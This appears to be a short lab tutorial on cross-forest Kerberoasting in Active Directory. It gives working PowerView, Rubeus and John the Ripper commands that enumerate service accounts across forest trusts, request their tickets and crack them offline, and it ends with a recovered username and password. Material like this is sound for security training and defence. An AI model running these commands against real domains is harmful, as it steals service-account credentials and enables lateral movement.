We will learn how to exploit cross-forest Kerberoasting attack

Loading PowerView

 . .\PowerView.ps1

Now let’s Find Kerberoastable users across the forest

Get-DomainTrust | ?{$_.TrustAttributes -eq 'FILTER_SIDS'} | %{Get-DomainUser -SPN -Domain $_.TargetName} | select samaccountname,serviceprincipalname

Notice that we got the user storagesvc is Kerberoastable

Now using Rubeus.exe to get TGS

.\Rubeus.exe kerberoast /user:storagesvc /simple /domain:eu.local /outfile:crosskerberoast.txt

As observed we got the hash of the user

Now cracking it with john

.\john.exe ..\..\crosskerberoast.txt --wordlist=..\..\kerberoast\10k-worst-pass.txt

and we got the password

username: storagesvc
password: Qwerty@123